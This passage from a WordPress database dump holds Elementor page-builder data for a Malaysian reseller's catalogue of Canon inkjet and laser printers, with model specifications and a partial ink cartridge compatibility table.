040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:2680;s:11:\"size_before\";i:30326;s:10:\"size_after\";i:27646;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:1974;s:11:\"size_before\";i:20166;s:10:\"size_after\";i:18192;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:4049;s:11:\"size_before\";i:40037;s:10:\"size_after\";i:35988;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(3877,2735,'_wp_page_template','template-fullwidth.php'),(3878,2735,'_elementor_edit_mode','builder'),(3879,2735,'_elementor_template_type','post'),(3880,2735,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p><br \\/>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p><br \\/>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p><br \\/>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 